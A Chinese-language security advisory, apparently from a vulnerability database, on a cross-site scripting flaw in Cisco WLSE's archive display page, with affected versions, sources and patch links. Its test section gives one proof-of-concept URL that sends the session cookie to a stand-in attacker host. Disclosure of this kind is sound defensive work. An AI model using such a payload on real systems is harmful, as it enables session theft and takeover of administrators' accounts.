发布日期：2006-04-19
更新日期：2006-04-19

受影响系统：

Cisco WLSE < 2.13
Cisco WLSE Express < 2.13

不受影响系统：

Cisco WLSE 2.13
Cisco WLSE Express 2.13

描述：

---

BUGTRAQ  ID: 17604

CiscoWorks WLSE是集中的系统级应用程序，用于管理和控制整个自治Cisco WLAN基础架构。

CiscoWorks WLSE配置管理脚本的实现上存在漏洞，攻击者可能利用此漏洞获取敏感信息。

WLSE设备中/wlse/configure/archive/archiveApplyDisplay.jsp的“displayMsg”参数可导致跨站脚本漏洞。攻击者可以利用这个漏洞窃取JSP会话cookie，然后结合其他漏洞获得对系统的管理级访问。

<*来源：Adam Pointon （http://www.assurance.com.au/）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=114546671802503&w=2
        http://marc.theaimsgroup.com/?l=bugtraq&m=114546635528611&w=2
        http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://cisco-wlse.example.org/wlse/configure/archive/archiveApplyDisplay.jsp?displayMsg=<script>document.location='http://attacker.example.org?'+document.cookie</script>

建议：

---

厂商补丁：

Cisco
-----
Cisco已经为此发布了一个安全公告（cisco-sa-20060419-wlse）以及相应补丁:
cisco-sa-20060419-wlse：Multiple Vulnerabilities in the WLSE Appliance
链接：http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml

补丁下载：
http://www.cisco.com/cgi-bin/tablebuild.pl/wlan-sol-eng

浏览次数：4223
严重程度：0（网友投票）